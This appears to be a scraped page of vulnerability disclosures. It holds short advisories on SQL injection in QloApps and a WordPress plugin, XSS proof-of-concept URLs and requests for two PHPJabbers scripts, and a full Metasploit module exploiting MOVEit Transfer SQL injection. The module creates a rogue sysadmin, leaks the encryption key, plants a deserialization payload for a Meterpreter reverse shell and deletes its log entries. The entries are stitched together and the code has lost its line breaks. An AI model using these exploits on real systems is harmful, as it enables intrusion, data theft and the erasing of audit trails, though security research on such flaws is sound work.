An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.

CVE-2023-36284

Unauth. SQL Injection (SQLi) vulnerability in InspireUI MStore API plugin <= 3.9.7 versions.

**Solution**

Fixed 

Update the WordPress MStore API plugin to the latest available version (at least 3.9.8).

Lucio Sá discovered and reported this SQL Injection vulnerability in WordPress MStore API Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information. This vulnerability has been fixed in version 3.9.8.

**Other vulnerabilities in this plugin**

 0 present

 12 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-47614: WordPress MStore API plugin <= 3.9.7 - SQL Injection - Patchstack

PHPJabbers Forum Script version 3.0 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.phpjabbers.com/php-forum-script/                               ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Forum Script 3.0                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /1687474733_118/preview.php?controller=pjLoad&action=pjActionAsk HTTP/1.1ask_question=1&name=[XSS Payload]&email=cracker@infosec.com&question=[XSS Payload]&description=[XSS Payload]&category_id=3-----------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'question' is vulnerable to XSSPOST parameter 'description' is vulnerable to XSS## Steps to Reproduce:1. Click on [+ New Question](as Guest)2. Inject your [XSS Payload] in "Full name"3. Inject your [XSS Payload] in "Question"4. Inject your [XSS Payload] in "Description"5. Select any [Category]6. Save (=Submit)5. When ADMIN Visit the [Questions] to Check [New Questions] on this Path (https://website/index.php?controller=pjAdminQuestions&action=pjActionIndex) in administration Panel6. XSS will Fire & Executed on his Browser7. Anyone visit your [Question Post] XSS will Fire & Executed on his Browser[-] Done

PHPJabbers Forum Script 3.0 Persistent Cross Site Scripting

PHPJabbers Forum Script version 3.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/php-forum-script/                               │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Forum Script 3.0                                                │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

URL parameter is vulnerable to RXSS

https://website/preview.php/xmbfr"><script>alert(1)</script>bqptl?controller=pjLoad&action=pjActionIndex&category_id=1

Path: /preview.php

GET parameter 'action' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndexje35u%3cimg%20src%3da%20onerror%3dalert(1)%3eo5ycr&category_id=1

Path: /preview.php

GET parameter 'column' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created%00undzx%3cscript%3ealert(1)%3c%2fscript%3eqqfc9&direction=DESC&keyword=

Path: /preview.php

GET parameter 'direction' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESCm1al6%22%3e%3cscript%3ealert(1)%3c%2fscript%3evwg49&keyword=

Path: /preview.php

GET parameter 'keyword' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=v467i%22%3e%3cscript%3ealert(1)%3c%2fscript%3ek9pxe

[-] Done

PHPJabbers Forum Script 3.0 Cross Site Scripting

This Metasploit module exploits an SQL injection vulnerability in the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can leverage an information leak be able to upload a .NET deserialization payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MOVEit SQL Injection vulnerability',        'Description' => %q{          This module exploits an SQL injection vulnerability in the MOVEit Transfer web application          that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.          Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an          attacker can leverage an information leak be able to upload a .NET deserialization payload.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # PoC https://github.com/sfewer-r7/CVE-2023-34362          'rbowes-r7', # research          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2023-34362' ],          ['URL', 'https://github.com/sfewer-r7/CVE-2023-34362'],          ['URL', 'https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis'],          ['URL', 'https://www.wiz.io/blog/cve-2023-34362']        ],        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Payload' => {          'Space' => 345        },        'Targets' => [          [            'Windows Command',            {              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'RPORT' => 443,                'SSL' => true              }            }          ],        ],        'DisclosureDate' => '2023-05-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Msf::OptString.new('TARGET_URI', [ false, 'Target URI', '/api/v1/token']),        Msf::OptString.new('USERNAME', [ true, 'Username', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('LOGIN_NAME', [ true, 'Login Name', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)])      ]    )    @moveit_token = nil    @moveit_instid = nil    @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com"    @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15)    @uploadfile_size = rand(5..64)    @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size)    @user_added = false    @files_json = nil  end  def begin_file_upload(folders_json, token_json)    boundary = rand_text_numeric(27)    post_data = "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n"    res = send_request_raw({      'method' => 'POST',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable"),      'headers' => {        'Content-Type' => 'multipart/form-data; boundary=' + boundary,        'Authorization' => "Bearer #{token_json['access_token']}"      },      'connection' => 'close',      'accept' => '*/*',      'data' => post_data.to_s    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #1 (#{files_response.body})") if res.nil? || res.code != 200    files_json = res.get_json_document    vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...")    files_json  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'),      'connection' => 'close',      'accept' => '*/*'    })    version = nil    if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version')      version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version'])      # 2020.1.x AKA 12.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10')      # 2021.0.x AKA 13.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8')      # 2021.1.x AKA 13.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6')      # 2022.0.x AKA 14.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6')      # 2022.1.x AKA 14.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7')      # 2023.0.x AKA 15.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3')    else      return Exploit::CheckCode::Safe    end    return Exploit::CheckCode::Unknown  end  def cleanup    cleanup_user(@files_json) if @user_added    super  end  def cleanup_user(files_json)    hax_username = datastore['USERNAME']    hax_loginname = datastore['LOGIN_NAME']    deleteuser_payload = [      "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload      "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", #      "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created      "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username      "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname      "DELETE FROM moveittransfer.log WHERE Username='Guest:#{@guest_email_addr}'", # The SQLi generates a guest log entry.    ]    if @user_added      vprint_status("Deleting user #{hax_username}")      sqli(sqli_payload(deleteuser_payload))      @user_added = false    end  end  def create_sysadmin    hax_username = datastore['USERNAME']    hax_password = datastore['PASSWORD']    hax_loginname = datastore['LOGIN_NAME']    createuser_payload = [      "UPDATE moveittransfer.hostpermits SET Host='*.*.*.*' WHERE Host!='*.*.*.*'",      "INSERT INTO moveittransfer.users (Username) VALUES ('#{hax_username}')",      "UPDATE moveittransfer.users SET LoginName='#{hax_loginname}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET InstID='#{@moveit_instid}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Password='#{makev1password(hax_password, Rex::Text.rand_text_alphanumeric(4))}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Permission='40' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET CreateStamp=NOW() WHERE Username='#{hax_username}'",    ]    res = sqli(sqli_payload(createuser_payload))    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't perform initial SQLi (#{res.body})") if res.code != 200    @user_added = true  end  def encrypt_deserialization_gadget(gadget, org_key)    org_key = org_key.gsub(' ', '')    org_key = [org_key].pack('H*').bytes.pack('C*')    deserialization_gadget = moveitv2encrypt(gadget, org_key)    deserialization_gadget  end  def find_folder_id(token_json)    folders_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('/api/v1/folders'),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API folders (#{folders_response.body})") if folders_response.nil? || folders_response.code != 200    folders_json = JSON.parse(folders_response.body)    vprint_status("Found folderId '#{folders_json['items'][0]['id']}'.")    folders_json  end  def get_csrf_token(res)    fail_with(Msf::Exploit::Failure::Unknown, 'No csrf token, or my code is bad') unless res.to_s.split(/\n/).join =~ /.*csrftoken" value="([a-f0-9]*)"/    ::Regexp.last_match(1)  end  def guestaccess_request(body)    res = send_request_cgi({      'method' => 'POST',      'keep_cookies' => true,      'uri' => normalize_uri('guestaccess.aspx'),      'connection' => 'close',      'accept' => '*/*',      'vars_post' => body    })    res  end  # Perform a request to the ISAPI endpoint with an arbitrary transaction  def isapi_request(transaction, headers)    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=m2'),      'keep_cookies' => true,      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'X-siLock-Test': 'abcdX-SILOCK-Transaction: folder_add_by_path',        'X-siLock-Transaction': transaction      }.merge(headers)    })  end  def leak_encryption_key(token_json, files_json)    haxleak_payload = [      # The \ gets escaped, so we leverage CHAR_LENGTH(39) to get the key we want (Standard Networks\siLock\Institutions\0) as all other KeyName's will be longer (Standard Networks\siLock\Institutions\1234)      "UPDATE moveittransfer.files SET UploadAgentBrand=(SELECT PairValue FROM moveittransfer.registryaudit WHERE PairName='Key' AND CHAR_LENGTH(KeyName)=#{'Standard Networks\siLock\Institutions\0'.length}) WHERE ID='#{files_json['fileId']}'"    ]    sqli(sqli_payload(haxleak_payload))    leak_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("/api/v1/files/#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #LEAK (#{leak_response.body})") if leak_response.nil? || leak_response.code != 200    leak_json = JSON.parse(leak_response.body)    org_key = leak_json['uploadAgentBrand']    vprint_status("Leaked the Org Key: #{org_key}")    org_key  end  def makev1password(password, salt = 'AAAA')    fail_with(Msf::Exploit::Failure::BadConfig, 'password cannot be empty') if password.empty?    fail_with(Msf::Exploit::Failure::BadConfig, 'salt must be 4 bytes') if salt.length != 4    # These two hardcoded values are found in MOVEit.DMZ.Core.Cryptography.Providers.SecretProvider.GetSecret    pwpre = Base64.decode64('=VT2jkEH3vAs=')    pwpost = Base64.decode64('=0maaSIA5oy0=')    md5 = Digest::MD5.new    md5.update(pwpre)    md5.update(salt)    md5.update(password)    md5.update(pwpost)    pw = [(4 + 4 + 16), 0, 0, 0].pack('CCCC')    pw << salt    pw << md5.digest    return Base64.strict_encode64(pw).gsub('+', '-')  end  def moveitv2encrypt(data, org_key, iv = nil, tag = '@%!')    fail_with(Msf::Exploit::Failure::BadConfig, 'org_key must be 16 bytyes') if org_key.length != 16    if iv.nil?      iv = Rex::Text.rand_text_alphanumeric(4)      # as we only store the first 4 bytes in the header, the IV must be a repeating 4 byte sequence.      iv *= 4    end    # MOVEit.DMZ.Core.Cryptography.Encryption    key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*')    key += org_key    key += [0, 0, 0, 0].pack('C*')    # MOVEit.Crypto.AesMOVEitCryptoTransform    cipher = OpenSSL::Cipher.new('AES-256-CBC')    cipher.encrypt    cipher.key = key    cipher.iv = iv    encrypted_data = cipher.update(data) + cipher.final    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader    header = [      225, # MOVEitV2EncryptedStringHeader      0,      data_sha1_hash[0],      data_sha1_hash[1],      org_key_sha1_hash[0],      org_key_sha1_hash[1],      org_key_sha1_hash[2],      org_key_sha1_hash[3],      iv.unpack('C*')[0],      iv.unpack('C*')[1],      iv.unpack('C*')[2],      iv.unpack('C*')[3],    ].pack('C*')    # MOVEit.DMZ.Core.Cryptography.Encryption    return tag + Base64.strict_encode64(header + encrypted_data)  end  def populate_token_instid    begin      res = send_request_cgi({        'method' => 'GET',        'keep_cookies' => true,        'connection' => 'keep-alive',        'accept' => '*/*'      })      cookies = res.get_cookies      # Get the session id from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!') unless cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/      @moveit_token = ::Regexp.last_match(1)      vprint_status("Received ASP.NET_SessionId cookie: #{@moveit_token}")      # Get the InstID from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!') unless cookies =~ /siLockLongTermInstID=([0-9]+);/      @moveit_instid = ::Regexp.last_match(1)      vprint_status("Received siLockLongTermInstID cookie: #{@moveit_instid}")    end    true  end  def request_api_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/api/v1/token'),      'Content-Type' => 'application/x-www-form-urlencoded',      'connection' => 'keep-alive',      'accept' => '*/*',      'vars_post' => {        'grant_type' => 'password',        'username' => datastore['LOGIN_NAME'],        'password' => datastore['PASSWORD']      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})") if res.code != 200    token_json = JSON.parse(res.body)    vprint_status("Got API access token='#{token_json['access_token']}'.")    token_json  end  def set_session(session_hash)    session_vars = {}    session_index = 0    session_hash.each_pair do |k, v|      session_vars["X-siLock-SessVar#{session_index}"] = "#{k}: #{v}"      session_index += 1    end    isapi_request('session_setvars', session_vars)  end  def sqli(sql_payload)    # Set up a fake package in the session. The order here is important. We set these session    # variables one per request, so first set the package information, then switch over to a    # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this    # order the session will be cleared and the injection will not work.    set_session({      'MyPkgAccessCode' => 'accesscode', # Must match the final request Arg06      'MyPkgID' => '0', # Is self provisioned? (must be 0)      'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs      'MyPkgInstID' => '1234', # this can be any int value      'MyPkgSelfProvisionedRecips' => sql_payload,      'MyUsername' => 'Guest'    })    # Get a CSRF token - this has to be *after* you set MyUsername, since the    # username is incorporated into it    #    # Transaction => request type, different types will work    # Arg06 => the package access code (must match what's set above)    # Arg12 => promptaccesscode requests a form, which contains a CSRF code    body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' }    csrf = get_csrf_token(guestaccess_request(body))    # This does the actual injection    body = {      'Arg06' => 'accesscode',      'transaction' => 'secmsgpost',      'Arg01' => 'subject',      'Arg04' => 'body',      'Arg05' => 'sendauto',      'Arg09' => 'pkgtest9',      'csrftoken' => csrf    }    guestaccess_request(body)  end  def sqli_payload(sql_payload)    # Create the initial injection, and create the session object    payload = [      # The initial injection      "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')",    ].concat(sql_payload)    # Join our payload, and terminate with a comment character    return payload.join(';') + ';#'  end  def trigger_deserialization(token_json, files_json, folders_json)    files_response = send_request_cgi({      'method' => 'PUT',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'verify' => false,      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}",        'Content-Type' => 'application/octet-stream',        'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}",        'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data)      },      'data' => @uploadfile_data    })    # 500 if payload runs :)    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #2 code=#{files_response.code} (#{files_response.body})") if files_response.code != 500  end  def upload_encrypted_gadget(encrypted_gadget, files_json)    haxupload_payload = [      "UPDATE moveittransfer.fileuploadinfo SET State='#{encrypted_gadget}' WHERE FileID='#{files_json['fileId']}'",    ]    vprint_status('Planting encrypted gadget into the DB...')    sqli(sqli_payload(haxupload_payload))  end  def exploit    # Get the sessionID and siLockLongTermInstID    print_status('[01/11] Get the sessionID and siLockLongTermInstID')    populate_token_instid    # Allow Remote Access and Create new sysAd    print_status('[02/11] Create New Sysadmin')    create_sysadmin    print_status('[03/11] Get API Token')    token_json = request_api_token    print_status('[04/11] Get Folder ID')    folders_json = find_folder_id(token_json)    print_status('[05/11] Begin File Upload')    @files_json = begin_file_upload(folders_json, token_json)    print_status('[06/11] Leak Encryption Key')    org_key = leak_encryption_key(token_json, @files_json)    print_status('[07/11] Generate Gadget')    gadget = ::Msf::Util::DotNetDeserialization.generate(      payload.encoded,      gadget_chain: :TextFormattingRunProperties,      formatter: :BinaryFormatter    )    print_status('[08/11] Encrypt Gadget')    b64_gadget = Rex::Text.encode_base64(gadget)    encrypted_gadget = encrypt_deserialization_gadget(b64_gadget, org_key)    print_status('[09/11] Upload Encrypted Gadget')    upload_encrypted_gadget(encrypted_gadget, @files_json)    print_status('[10/11] Trigger Gadget')    trigger_deserialization(token_json, @files_json, folders_json)    print_status('[11/11] Cleaning Up')    cleanup_user(@files_json)  endend

MOVEit SQL Injection

PHPJabbers STIVA Blog Script version 4.1 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/stiva-blog-script/                              │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers STIVA Blog Script 4.1                                           │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

GET 'category_id' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&category_id=5qn281%22%3e%3cscript%3ealert(1)%3c%2fscript%3enjmk9

GET 'lid' parameter is vulnerable to RXSS

https://website/preview.php?lid=umxpr"><script>alert(1)</script>dbyiw&pjPage=2

GET 'archive' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=b5bzk%22%3e%3cscript%3ealert(1)%3c%2fscript%3em9gtp&keyword=123

GET 'keyword' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=&keyword=123fcgbt%22%3e%3cscript%3ealert(1)%3c%2fscript%3eya0py

URL parameter is vulnerable to RXSS

https://website/preview.php/f76te"><script>alert(1)</script>cq8x2?controller=pjLoad&action=pjActionIndex&category_id=5

[-] Done

Tag

#sql